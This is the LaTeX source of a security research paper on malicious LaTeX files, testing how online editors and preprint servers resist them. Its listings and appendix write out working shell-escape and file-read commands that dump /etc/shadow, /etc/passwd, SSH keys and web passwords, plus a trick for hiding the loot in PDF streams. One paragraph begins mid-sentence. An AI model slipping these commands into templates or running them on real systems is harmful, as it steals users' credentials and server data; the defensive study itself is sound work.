\documentclass[runningheads]{llncs}

\usepackage{graphicx,color}
\usepackage{fullpage}
\usepackage{multirow}
\usepackage{listings,color,graphics}
\usepackage{tikz,url}
\usepackage{cite}
\usepackage{lipsum}  
\usepackage{float}
\usepackage{calc}
\usepackage{array}
\newcolumntype{P}[1]{>{\centering\arraybackslash}p{#1}}
\usepackage{amssymb}% http://ctan.org/pkg/amssymb
\usepackage{pifont}% http://ctan.org/pkg/pifont
\newcommand{\cmark}{\ding{51}}%
\newcommand{\xmark}{\ding{55}}% 
\begin{document}
\title{Can You Accept LaTeX Files from Strangers?\\ Ten Years Later}
\titlerunning{Malicious \LaTeX{} Files}
% If the paper title is too long for the running head, you can set
% an abbreviated paper title here
%
\author{ Guilhem Lacombe\inst{1} \and
Kseniia Masalygina\inst{1,3} \and
Anass Tahiri\inst{1,3} \and
Carole Adam\inst{1,4} \and
C\'edric Lauradoux\inst{1,2}}

\authorrunning{C. Adam et al.}
% First names are abbreviated in the running head.
% If there are more than two authors, 'et al.' is used.
%
\institute{Univ. Grenoble Alpes, Grenoble, France \and
Inria, Grenoble, France\and
Grenoble INP, Grenoble, France\and
Grenoble Informatics Laboratory
}
\maketitle              % typeset the header of the contribution
\begin{abstract}
It is well-known that Microsoft Word/Excel compatible documents or PDF files can contain malicious content. \LaTeX{} files are unfortunately no exception either. \LaTeX{} users often include third-party codes through sources or packages (\texttt{.sty} or \texttt{.cls} files). But those packages can execute malicious commands on the users' system, in order to capture sensitive information or to perform denial of service attacks. Checkoway et al.~\cite{Checkoway2010a} were the first to warn \LaTeX{} users of these threats. Collaborative cloud-based \LaTeX{} editors and services compiling \LaTeX{} sources are particularly concerned. In this paper, we have created a \LaTeX{} package that collects system data and hides them inside the PDF file produced by the target. Then, we have measured what can be recovered by hackers using malicious \LaTeX{} file on online services, and which measures those services have enforced to thwart the threats. Services defend themselves using sandbox or commands restrictions. Commands restrictions are more difficult to setup and we found one service (PMLatex) which is too permissive.
\end{abstract}

\section{Introduction}  \label{sec:intro}

Most computer users are aware that it is not safe to download Microsoft Office~\cite{Muller2020} or PDF files~\cite{Stevens2011} from unknown sources on the Internet or in any other potentially insecure locations. Indeed, those files may contain malicious macros, pieces of code that can harm the user's system. This kind of documents needs to be opened with caution, for instance in a sandbox. The users are mostly aware of these necessary precautions, although they do not necessarily apply them.

In the computer science research community, \LaTeX{} is the go-to typesetting system for writing scientific papers. It works as follows: the user writes their document in plain text, formats it with the use of \LaTeX{}'s  macros (or commands), and compiles it using one of the available compilers to produce the final PDF document. Most users\footnote{\url{http://web.mit.edu/klund/www/urk/texvword.html}, accessed on 14 January 2021.} assume that \LaTeX{} files cannot be malicious, and that it is safe to get \LaTeX{} files from unknown sources. As a result, they do not take any precautions when using third-party templates.

Yet, it has been established in 2010 that \LaTeX{} is easily exploitable to perform malicious tasks \cite{mcmillan1994platform,Checkoway2010a}. In particular, Checkoway \textit{et al.} showed that \LaTeX\ files present a threat to system security and data privacy. They described how to exploit \LaTeX{} to perform denial of service attacks, or to exfiltrate sensitive information on Web-based \LaTeX{} previewer services. 

Since 2010, the \LaTeX{} ecosystem has significantly evolved, many services tested in their work have been discontinued, and new ones have appeared, seeing the rise of collaborative \LaTeX{} editors such as Overleaf. However, no other work has been published on the potential threats. Specifically, these editors can be targeted by malicious \LaTeX{} files; and their online templates libraries\footnote{\url{https://www.overleaf.com/latex/templates}} could be used to distribute malicious \LaTeX{} files to many users.

% il faut aussi préciser que ça ne concerne que la communauté informatique, parce qu'en géo / socio / etc, c'est word et pas latex

%\blue{In the latex community, most users and service providers are not even aware that similar precautions should be taken. Many service providers rely on 2010 paper that recommended to simply forbid some latex commands. The goal of the present paper is to show that this approach is limited, and should be replaced by systematically using a sandbox to compile latex files.}

%However, this cautious behaviour is not followed in the \LaTeX{} community \red{REF? statistiques? justification? par ailleurs, tu as dit que les utilisateurs de word en sont conscients, mais est-ce qu'ils sont vraiment prudents ou ça en reste au stade de la conscience??}. \red{PROBABLY remove this}

This is why we have replicated and extended Checkoway \textit{et al.}'s work. We have created our own malicious \LaTeX{} files to test five online \LaTeX{} editors, and two pre-print services that compile \LaTeX{} files (\url{https://arxiv.org} and \url{https://hal.archives-ouvertes.fr/?lang=en}). We have observed that two strategies (already suggested by \cite{Checkoway2010a}) have been adopted to prevent malicious use of \LaTeX{} files: \LaTeX{} command restrictions, or compilation of the sources in a sandbox. Our results show that command restrictions are not sufficiently protective: on services using only this strategy, we were still able to obtain sensitive information on the system used to compile the \LaTeX{} sources: hardware, software (allowing to detect when outdated software is still used, and then exploit their vulnerabilities), or network interfaces (including IP addresses or server configurations). We therefore recommend that these services should systematically compile \LaTeX{} code inside a sandbox to ensure their users' protection from such attacks.

This paper is organized as follows. Section~\ref{sec:intro} discusses a couple of previous works about malicious \LaTeX{} files in relation to our own proposition. Section~\ref{sec:contrib} details how we crafted out malicious files, which features we exploited, and how we hid the stolen information in the resulting PDF file. Section~\ref{sec:tests} presents our findings after testing our malicious file on various online \LaTeX{} previewers. Finally, Section~\ref{sec:cci} concludes the paper.

 macros. If the users do not pay attention to this section of their document, they will compile it without noticing the virus, and trigger its malicious behaviour.

%Since the virus defines macros whose names start with ‘@’, the first thing that it does is making \LaTeX\ treat this character as a normal letter by changing its \path{catcode}. This avoids detection if and when the user tries to define macros with the same names. The virus also turns other special characters into normal ones to prevent unwanted behavior from \LaTeX\ when reading them from other \path{.tex} files. After this, the virus either opens the Emacs listing file or creates it using the Emacs LISP language, but only if the Emacs startup file exists otherwise the virus does not do anything, and here lies its most significant dependency.

%After this, the virus parses the listing file and takes each file with the \path{.tex} extension, checks if it is an actual \LaTeX\  file, if it is, the virus checks if it has already been infected by looking for the \verb %DoNotInfectMe  tag, and only if it finds it does it start appending itself to the current file which was copied beforehand in the associated .aux file used as a temporary buffer.

\subsection{Positioning of our work}

In this paper, we focus on first goal: craft a \LaTeX{} file that can extract information when compiled. But contrarily to~\cite{Checkoway2010a}, we did not include the stolen data verbatim in the PDF file. This would be too easy to notice, but instead we tried to hide it to make it as undetectable as possible. This way, the users cannot even realise that information has been leaked. We have tested our malicious file on different online collaborative \LaTeX{} editors, in order to determine how well they are protected against that sort of attacks. Section~\ref{sec:contrib} describes how we crafted our malicious file, and Section~\ref{sec:tests} discusses the results of our experiments with this file.

%There are two differences between our work and the results of Checkoway \textit{et al.}~\cite{Checkoway2010a}
%One major difference between the two being that, instead of inserting the stolen data in the PDF file verbatim, we will hide our findings and make them as undetectable as possible. We will also be exploiting \LaTeX's I/O features to read files, just like most of the few already existing malicious \LaTeX{} files. Finally, we will test our malicious \LaTeX{} files on online previewers. 
\section{Building a malicious \LaTeX{} file}  \label{sec:contrib}

\subsection{Malicious use of \LaTeX{} commands}

%In this section, malicious LaTeX commands are described. 
\LaTeX{} has become the most authoritative document preparation system among the Computer Science research community. Users tend to trust it without caution, thinking it is only a harmless typesetting system, so they download and compile \LaTeX{} files without checking their code. However, \LaTeX{} has more uses than simple document preparation: being based on \TeX{}, a Turing-complete programming language, \LaTeX{} can be programmed to compute anything. In particular, it is easy to read files, write to files, or execute code snippets, directly from \LaTeX{} files. There are multiple ways for an attacker to collect data about the user's system. 

To read files without proper authorization and insert their content into the compiled PDF file, \verb \input  or \verb \include  commands can be applied (as shown in Listing~\ref{input}).  
\begin{lstlisting}[language=TeX, caption ={Retrieving password for user's account},label={input}]
\input{/etc/shadow} 
\end{lstlisting}
These commands might be restricted, in which case the files can be read line by line with \verb \read  instruction. %However, this approach is limited by the read permissions of the target files.

The attacker can also manipulate the \LaTeX{} file in such a way that the compiler will execute code beyond simply generating the PDF document. %That code will be run with the permissions of the current user. 
\verb \immediate  and \verb \write18  are TeX primitive responsible for arbitrary code execution. \verb \write18  will issue a command to the shell; the operating system will run the command and suspend \LaTeX{}'s execution until it is finished. \verb \write18 allows running commands that can provide further information about the targeted system. However, the \verb --shell-escape  argument must be activated when compiling to explicitly allow running external commands from the \LaTeX{} file. \verb \immediate  must also be used to ensure that the code will be executed as soon as \LaTeX{} encounters it. Listing~\ref{uname} demonstrates how to use the \verb \immediate  and \verb \write18  primitives. 
\begin{lstlisting}[language=TeX, caption ={Printing basic system information.},label={uname}]
\immediate\write18{uname -a >> output.txt}
\input{output.txt}
\end{lstlisting}

Another possibility to breach the data confidentiality on a computer through \LaTeX{} is to rewrite configuration files and then use provided credentials to get private data from the device.

The same results can be achieved by using Lua\TeX{} primitives instead. Lua\TeX{} supports two programming languages: \TeX-\ based language and Lua scripting language. In some situations, Lua simplifies the user experience. \verb \directlua command allows to add Lua code to a \LaTeX{} file; that code is passed to the Lua\TeX{} interpreter. It offers more opportunities to the attacker. 

Reading or writing data with a \LaTeX{} file gives an attacker access to all documents within the permissions of the user compiling this file. Compilation of \LaTeX{} files as root will grant elevated permissions, including undesired access to all documents on the system. \LaTeX{} files must never be compiled with the root privileges.

\subsection{Examples of target data}

%We have identified the \LaTeX{} commands for data collection. Now we need to decide on the objectives of this process. 

Information gathering is of paramount importance for a hacker. Footprinting can greatly increase the probability of success of an attack. It can expose essential security information of the system, allowing attackers to identify vulnerabilities in the target. Most footprinting techniques are aimed at discovering information from the network (internet, intranet, remote access or extranet) or the user system. 

System information includes group names and users, passwords, operating system used, system architecture, hardware configuration, outdated software, and known vulnerabilities. Listing \ref{user} shows the retrieval of group names and users.
    \begin{lstlisting}[language=TeX, caption={Getting user and group names}, label={user}]
\immediate\write18{users >> output.txt}
\immediate\write18{groups >> output.txt}
\immediate\write18{cat /etc/passwd >> output.txt}
\immediate\write18{cat /etc/group >> output.txt}
    \end{lstlisting}

Network information includes protocols used, routing tables, host names, open ports, etc. The commands in listing \ref{net} display the current network configuration of the system. 
    \begin{lstlisting}[language=TeX, caption={Obtaining information about network interfaces including IP addresses}, label={net}]
\immediate\write18{ifconfig >> output.txt}
\immediate\write18{cat /etc/network/interfaces >> output.txt}
    \end{lstlisting}

An indicative list of commands used for information gathering is presented in Appendix \ref{appendix}. This list should not be considered to be exhaustive.

\subsection{Hiding data in PDF files}
%In the previous paragraph, we discussed how to use \LaTeX{} commands to obtain sensitive information. 

We now need to consider how to exfiltrate the gathered information without alarming the victim. The obvious solution is to insert it into the generated PDF file in a way that makes it hard to detect. The PDF file rendering should not be altered when it is viewed; the output should meet the user's expectations; and the file should open in common PDF viewers without errors.

There are many steganographic methods \cite{Bender1996,Petitcolas1999} for hiding information in PDF files~\cite{nsa}, but all of them~\cite{Zhong2007,Lee2009,Kuribayashi2018} require to already receive the PDF file as input, alongside the information to hide. However, in our case, we are limited by the fact that we need to perform all our operations (data collection and hiding) while the PDF file is still being compiled, so it is not possible to use these existing steganographic methods.

%Also assumptions about the user maybe? That he/she will compile the file without any checks?

%methods compatible with constraints (see NSA paper) + pros and cons
%   -white text + layering:
%       -pros: easy, no lua
%       -cons: easily defeated by regular users (text can be selected in viewers)

A first method one may think of is to simply add the output of the malicious commands as white text layered under other elements (text, images\ldots). This is easily achieved using existing packages (such as Tikz) and does not rely on Lua\TeX{} scripts, which means that it works in any \LaTeX{} environment. But this method can be detected simply by an accidental select-and-copy made by a user in a PDF viewer: this is too  risky for the attacker.

Another method to hide data in PDF files is to include it directly in the file as PDF comments. The PDF standard~\cite{pdf_standard} allows comments as any string of characters following the \% character and terminated by an end-of-line. They do not appear in any way when viewing the file. Unfortunately, there is no way to add comments to the output PDF in \LaTeX{}.  % which means that we have to insert them ourselves using Lua scripts.
One can also hide information after the end-of-file token; most viewers have no trouble opening such files, except Acrobat Reader which considers them corrupted.

We choose to hide information into the output PDF as unindexed streams. 
Stream objects are a basic element in PDF files, describing text, images\ldots which are drawn in pages. These objects can be compressed. Objects need to be indexed to be drawn at the correct location, but unindexed objects will not be drawn at all. This method is very convenient since they are supported by all PDF viewers. It is easy to implement, does not require Lua, and makes our stolen data very hard to detect thanks to its compression. On the other hand, recovering the data requires a bit more effort than with the other methods since we need to uncompress the stream. 
Note that it is possible to disable compression using the \texttt{\textbackslash pdfcompresslevel=0} and \texttt{\textbackslash pdfobjcompresslevel=0} commands. 
We use the \texttt{\textbackslash immediate\textbackslash pdfobj} \LaTeX{} command with a text file containing the information to hide as input, as illustrated in Listing~\ref{hidin}. Note that our method does not work in DVI mode since this mode disables the use of the \texttt{\textbackslash pdfobj} command. 
\begin{lstlisting}[language=TeX, caption={\LaTeX{} command to insert an unindexed stream from a file}, label={hidin}]
\immediate\pdfobj \file{input.txt}
\end{lstlisting}
Encryption can also be used to further hide the data, but there is no simple method to encrypt text in \LaTeX{} files.

%ideas for obfuscation
%   -use packages that require lua
%   -hide macros in large source files / make a malicious package (ppl don't really look at package code...)
%   -encrypt / transform leaked data (so that it is not easily spotted / looks random when opening embedded file in text editor)

\section{Testing Online Latex Services} \label{sec:tests}

\subsection{Targets}

Anybody compiling \LaTeX{} files on his/her personal computer can be the target of the malicious files designed in the previous section. It appears that there is also two types of services that compile \LaTeX{} files online: collaborative editors and scientific documents repositories. 

\subsubsection{Online collaborative \LaTeX{} editors} allow several users to contribute to source file that are compiled on the server running the editor. They are often cloud-based solutions.  If adversaries compile malicious \LaTeX{} files on an online collaborative \LaTeX{} editor,  they can directly obtain the results of their attacks in the PDF compiled by the server. If the attack is successful, it can compromise the security of the server and the whole security of the service. The online collaborative \LaTeX{} editors considered in this study are given in Table~\ref{tab:target}. 

\begin{table}[ht]
\begin{center}
    \begin{tabular}{|l|r|}
    \hline
    \textbf{Online Editors}     &  \textbf{URL}\\ \hline
     Overleaf    & \url{https://www.overleaf.com/} \\
     Papeeria    & \url{https://www.papeeria.com} \\ 
     Authorea    & \url{https://www.authorea.com} \\
     CoCalc      & \url{https://cocalc.com/doc/latex-editor.html}\\
     PLMlatex    & \url{https://plmlatex.math.cnrs.fr/} \\ \hline \hline
     \textbf{Online Repositories}     &  \textbf{URL}\\ \hline
     HAL         & \url{https://hal.archives-ouvertes.fr/}\\
     arXiv       & \url{https://arxiv.org/} \\ \hline
    \end{tabular}
    \caption{Online services targeted and tested in this study.}\label{tab:target}
\end{center}
\end{table}

Overleaf is nowadays very popular: they have more than six million users from academia and the scientific community according to their website. Papeeria and Authorea are less populare alternatives to Overleaf.  PLMlatex is \LaTeX{} editor in French run by French National Centre for Scientific Research (CNRS). The editor is powered by Share\LaTeX{} so its functionality is very close to Overleaf. CoCalc has more functionalities as it is an  online workspace for calculations, research, collaboration and authoring documents. 

\subsubsection{Scientific documents repositories} publish PDF files from their authors. They are pre-print servers or academic publishers. They either accept directly to publish the PDF files from the authors or they ask the authors to provide their \LaTeX{} sources and compile them to obtain a PDF file. In the latter case, they can be targeted by malicious \LaTeX{} files.  We have tested two scientific document repositories (see Table~\ref{tab:target}). HAL (\url{https://hal.archives-ouvertes.fr/}) is an open archive where authors can submit documents from all academic fields. HAL was created jointly by the \textit{Centre pour la communication scientifique directe} (CCSD), the \textit{Institut des Sciences de l'Homme} and the University of Rennes 2, with the support of the CNRS. HAL accepts both PDF and \LaTeX{} sources from the authors. arXiv (\url{https://arxiv.org/}) is a free distribution service and an open-access archive managed by Cornell University.

To analyse the security level of these services, we tried to gain information about their servers. We uploaded \LaTeX{} malicious files. First, we attempted to compile it with Lua commands. If the service does not support it, the version without Lua code is used. The findings are presented in the rest of this section. 

\subsection{Observations}

%outline

%security strategies
Our first observation was that all the services we tested are aware that  malicious \LaTeX{} files exist: they have all implemented some measures to avoid their threats. They are also all based on Unix-like systems. Preliminary results are gathered in Table~\ref{tab:obs}. We observed two defensive strategies: \textbf{command restrictions} vs \textbf{sandbox}. They are both suggested in~\cite{Checkoway2010a,Checkoway2010b}.

\begin{table}[ht]
\begin{center}
\begin{tabular}{|l|c|c|c|c|}
\hline
\textbf{Service} & \multicolumn{3}{c|}{\textbf{Commands Restrictions}} & \textbf{Sandbox} \\  \hline
                 & Shell-escape & File I/O & Lua\TeX{} & \\  \hline
Overleaf & \xmark{}  & \xmark{} & \xmark{} & Docker\\ \hline
Papeeria & \xmark{}  & \xmark{} & \xmark{} & Docker \\ \hline
CoCalc & \xmark{}  & \xmark{} & \xmark{}& Kubernetes\\ \hline
PLMlatex & \cmark{}  & \xmark{} & \xmark{}& \xmark{}\\  \hline
Authorea & \cmark{} & \cmark{} & \cmark{} & \textbf{?} \\ \hline
HAL & \cmark{}  & \cmark{} & \cmark{}& \textbf{?}\\ \hline 
arXiv & \cmark{}  & \cmark{} & \cmark{} & \textbf{?} \\ \hline
\end{tabular}
\end{center}
\caption{Characteristics observed on the services. A check mark indicates that the service implements a restriction.}\label{tab:obs}
\end{table}

%   - restrict dangerous functionalities (plm, authorea, hal)
%       - restricted user capabilities -> higher security? or false sense of security? maybe not fit for all uses

\subsubsection{Command Restrictions} is perhaps the most straightforward is to restrict the use of dangerous commands. It implies to change the compilation options of the \LaTeX{} environment. We observed it includes:
\begin{itemize}
    \item disabling shell escape to prevent users from executing shell commands,
        \item or preventing file inputs and outputs,
    \item or not supporting Lua\TeX{}.
\end{itemize} 
PLMlatex, Authorea, HAL and arXiv are using this strategy (Table~\ref{tab:obs}). Unfortunately, this means that these services have reduced functionalities compared to other ones, and while this seems like a good approach, it would not work if new strategies are found using non-blacklisted commands. In 2010, this was the most popular strategy used by online services according to Checkoway \textit{et al.}~\cite{Checkoway2010a}. Authorea, HAL and arXiv implements all the restrictions while \textbf{PLMlatex only relies on the restrictions of shell espace to defend itself.} 

If restricting the user is compatible with the intended use of the service, one should note that not supporting Lua\TeX{} and disabling shell escape is not enough to prevent data collection. Indeed, regular \LaTeX{} commands already give a lot of power to the user, and Lua\TeX{} mostly provides the same functionalities, but with better quality of life for the attacker. Disabling shell escape does restrict what information the user can access, however the content of sensitive files that are readable is still vulnerable. In order to effectively prevent users from easily gathering information, one should therefore disable file inputs and outputs as well. This is why PLMlatex is vulnerable. 

To illustrate the previous point, we were able without executing shell commands to read the content of senstive file like \texttt{/etc/network/interfaces} in the server of PLMlatex, which contained the IP address of the server hosting the service. Looking up this IP on \url{www.shodan.io} confirmed that the server in question is affiliated to the CNRS and revealed that it is located in Bordeaux and uses \texttt{nginx}. From this information, we were able to guess where the server configuration file was located and to read its content. In comparison, HAL, Authorea and arXiv block all inputs, outputs and shell escape, and we were unable to get any information on them (so they do not appear in Table~\ref{tab:info}).

\subsubsection{Sandboxes} allow services to support all functionalities of \LaTeX{}. It is more user-friendly but it requires more work from the administrators at the setup time of the service than commands restrictions. Overleaf, Papeeria and CoCalc all use this strategy.  CoCalc even goes as far as providing a shell to its users. However, this also means that their security relies on a third party product like \texttt{Docker} or \texttt{Kubernetes}.

Since services relying on their sandbox do not restrict the user, it is possible to acquire some information on them, but most of it is of little use. For example, in Table~\ref{tab:info} we can see that we were able to get some information on the system, the CPU, users and outdated software for Overleaf, Papeeria and CoCalc, but since they all make use of sandboxing this does not reveal anything about the underlying system. It is worth noting however that it is possible to identify what sandbox is used by reading the content \texttt{/proc/self/cgroup}. This can be useful if there exists an exploit allowing to escape it. On Overleaf, some basic Unix commands which are not useful for the service such as \texttt{ifconfig} are not present in the Docker container, perhaps as an additional security precaution. On the other hand, they do provide a python interpreter which can be used through \textbf{\textbackslash write18}.

\begin{table*}[!ht]
\begin{center} %make sure the sum of fractions is 1
\begin{tabular}{|P{.15\textwidth-2\tabcolsep}|P{.18\textwidth-2\tabcolsep}|P{.12\textwidth-2\tabcolsep}|P{.15\textwidth-2\tabcolsep}|P{.09\textwidth-2\tabcolsep}|P{.16\textwidth-2\tabcolsep}|P{.15\textwidth-2\tabcolsep}|} 
\hline
Service & User and\newline group names & System & Hardware & CPU & Passwords & Outdated software \\ \hline 
Overleaf & \cmark{} & \cmark{} & \xmark{} & \cmark{} & \xmark{} & \cmark{} \\ \hline
Papeeria & \cmark{} & \cmark{} & \xmark{} & \cmark{} & \xmark{} & \cmark{} \\ \hline
PLMlatex & \cmark{} & \cmark{} & \xmark{} & \xmark{} & \xmark{} & \xmark{} \\ \hline
CoCalc & \cmark{} & \cmark{} & \xmark{} & \cmark{} & \xmark{} & \cmark{} \\ \hline
Authorea & \xmark{} & \xmark{} & \xmark{} & \xmark{} & \xmark{} & \xmark{} \\ \hline
\end{tabular}
\begin{tabular}{|P{.15\textwidth-2\tabcolsep}|P{.18\textwidth-2\tabcolsep}|P{.22\textwidth-2\tabcolsep}|P{.15\textwidth-2\tabcolsep}|P{.16\textwidth-2\tabcolsep}|P{.14\textwidth-2\tabcolsep}|} 
\hline
Service & Known\newline vulnerabilities & Open ports and\newline running services &  Network\newline interfaces & Hostnames & Networking\newline protocols \\ \hline 
Overleaf & \xmark{} & \xmark{} & \xmark{} & \xmark{} & \xmark{} \\ \hline
Papeeria & \xmark{} & \xmark{} & \xmark{} & \cmark{} & \cmark{} \\ \hline
PLMlatex & \xmark{} & \xmark{} & \cmark{} & \cmark{} & \cmark{} \\ \hline
CoCalc & \xmark{} & \cmark{} & \xmark{} & \cmark{} & \cmark{} \\ \hline
Authorea & \xmark{} & \xmark{} & \xmark{} & \xmark{} & \xmark{} \\ \hline
\end{tabular}
\begin{tabular}{|P{.15\textwidth-2\tabcolsep}|P{.2\textwidth-2\tabcolsep}|P{.16\textwidth-2\tabcolsep}|P{.17\textwidth-2\tabcolsep}|P{.16\textwidth-2\tabcolsep}|P{.16\textwidth-2\tabcolsep}|} 
\hline
Service &  Firewall\newline configurations &  Routing\newline tables & Server\newline configuration & Web\newline passwords & SSL certificates \\ \hline 
Overleaf & \xmark{} & \xmark{} & \xmark{} & \xmark{} & \xmark{} \\ \hline
Papeeria & \xmark{} & \xmark{} & \xmark{} & \xmark{} & \xmark{} \\ \hline
PLMlatex & \xmark{} & \xmark{} & \cmark{} & \xmark{} & \xmark{} \\ \hline
CoCalc & \xmark{} & \cmark{} & \cmark{} & \xmark{} & \xmark{} \\ \hline
Authorea & \xmark{} & \xmark{} & \xmark{} & \xmark{} & \xmark{} \\ \hline
\end{tabular}
\caption{Information obtained by exploiting the file Input/Ouput.}\label{tab:info}
\end{center}
\end{table*}

On a last note, it does not seem that any of the services we looked at attempt to prevent users from hiding information into the output file. Whenever we were prevented from doing so with one method, it was due to a security measure we already discussed. Only HAL prevented us from inserting unindexed streams by having their compiler set to DVI output mode, but this is probably not intended for this purpose.

%concl
%   - sandboxing works as long as the sandbox can be trusted (exploits happen)
%   - restricting can work, but it's not foolproof
%       - impacts the user more
%       - compromise => leaving gaps in defense without sandbox = issues (plm)
%       - may still want to sandbox just in case

Checkoway et al. \cite{Checkoway2010a} already noticed that dangerous commands not being blacklisted was a very common issue at the time. As a result, they recommended blacklisting all commands by default and whitelisting harmless ones instead. However, this can significantly affect the users experience since many packages may be broken by this strategy. Using a modern sandbox seems to be more attractive.

\section{Conclusion} \label{sec:cci}

It is easy to include malicious commands in a style file and to distribute it widely in a template. These commands can then access sensitive data on the user's system, and we demonstrated that they can even be used to silently exfiltrate data via the PDF file created. Then, the attacker only needs to identify PDF files produced using their style file, once published or shared, in order to recover the stolen data hidden inside them.

All the online \LaTeX{} services examined in this paper implement some level of protection to avoid the threats of harmful \LaTeX{} files. They either compile \LaTeX{} files inside a sandbox or enforce commands restrictions. Although both approaches can be effective against dangerous \LaTeX{} commands, it can be difficult to implement the latter correctly. Indeed, it is hard to exhaustively list all commands that might prove dangerous when used maliciously. The collaborative \LaTeX{} editor PMLatex is a good example of this difficulty: we were able to retrieve confidential information on the server running the service, which was not restrictive enough. As a result, we recommend that these services should instead systematically use a sandbox to compile \LaTeX{} files. Indeed, it provides the strongest protection against such attacks, while still allowing the users to run any command they need.

So far, the malicious files designed in this paper only targeted Unix-like systems, as was the case with previous attempts~\cite{mcmillan1994platform,Checkoway2010a,Checkoway2010b}. Indeed, Unix is the most used operating system by \LaTeX{} previewing services and users. Yet, it would be interesting in future work to adapt our malicious files to test services on other operating systems, namely Microsoft Windows or Mac OS. Other interesting services to test in the future include scientific editors that compile article submissions.

%main points
% malicious latex commands:
% - read files 
% - execute arb code
% hiding data: 
% - insert data into another pdf and embed it to the main doc with Lua scripts
% - unindexed streams
% testing results:
% - restriction of potentially dangerous commands
% - sandboxing

%recommendations:
% for all:
% - for online services: combine restrictions and sandboxing
% - for regular users:  may want to compile online rather than on your own machine + do not compile code from unreliable source

%significance or results
% it shows that LaTeX files  should not be trusted + the topic is still relevant with modern online services

%future work
% - virus - y
% - DoS - n, gives us nothing on conf data

%
% ---- Bibliography ----
%
% BibTeX users should specify bibliography style 'splncs04'.
% References will then be sorted and formatted in the correct style.
%
\nocite*{}
\bibliographystyle{splncs04}
\bibliography{main}

\appendix
\section{The full list of malicious \LaTeX{} commands}
\label{appendix}
System information:
\begin{itemize}
    \item User and group names.
    \begin{lstlisting}[language=TeX]
\immediate\write18{users >> output.txt}
\immediate\write18{groups >> output.txt}
\immediate\write18{cat /etc/passwd >> output.txt}
\immediate\write18{cat /etc/group >> output.txt}
    \end{lstlisting}
    \item System information (the processor architecture, the system name and the version of the kernel running on the system).
    \begin{lstlisting}[language=TeX]
\immediate\write18{uname -a >> output.txt}
    \end{lstlisting}    
    \item Hardware information.
    \begin{lstlisting}[language=TeX]
\immediate\write18{lshw -short >> output.txt}
    \end{lstlisting}
    \item CPU information.
    \begin{lstlisting}[language=TeX]
\immediate\write18{lscpu >> output.txt}
    \end{lstlisting}
    \item Passwords.
    \begin{lstlisting}[language=TeX]
\immediate\write18{cat /etc/shadow >> output.txt}
    \end{lstlisting}
    \item Outdated software.
    \begin{lstlisting}[language=TeX]
\immediate\write18{apt list --upgradable >> output.txt}
    \end{lstlisting}
    \item Known vulnerabilities.
    \begin{lstlisting}[language=TeX]
\immediate\write18{debsecan | grep "high urgency" | grep "remotely exploitable" >> output.txt}
    \end{lstlisting}
\end{itemize}
Network information:
\begin{itemize}
    \item Open ports and running services.
    \begin{lstlisting}[language=TeX]
\immediate\write18{nmap localhost >> output.txt}
\immediate\write18{netstat -tulpn | grep LISTEN >> output.txt}
    \end{lstlisting}
    \item Network interfaces with IP addresses.
    \begin{lstlisting}[language=TeX]
\immediate\write18{ifconfig >> output.txt}
\immediate\write18{cat /etc/network/interfaces >> output.txt}
    \end{lstlisting}
    \item Hostnames.
    \begin{lstlisting}[language=TeX]
\immediate\input{/etc/hosts}
    \end{lstlisting}
    \item Networking protocols.
    \begin{lstlisting}[language=TeX]
\immediate\write18{cat /etc/protocols >> output.txt}
    \end{lstlisting}
    \item Firewall configurations.
    \begin{lstlisting}[language=TeX]
\immediate\write18{iptables -S >> output.txt}
    \end{lstlisting}
    \item Routing tables.
    \begin{lstlisting}[language=TeX]
\immediate\write18{netstat -rn >> output.txt}
    \end{lstlisting}
    \item Configurations of web servers.
    \begin{lstlisting}[language=TeX]
\immediate\write18{cat /etc/ssh/sshd_config >> output.txt}
\immediate\write18{cat /etc/apache2/apache2.conf >> output.txt}
    \end{lstlisting}
    \item Web passwords.
    \begin{lstlisting}[language=TeX]
\immediate\write18{cat /etc/apache2/.htpasswd >> output.txt}
    \end{lstlisting}
    \item SSL certificates.
    \begin{lstlisting}[language=TeX]
\immediate\write18{cat /etc/ssh/*_key>> output.txt}
    \end{lstlisting}
\end{itemize}
Hiding information:
\begin{lstlisting}[language=TeX]
\immediate\pdfobj file{output.txt}
\end{lstlisting}

\end{document}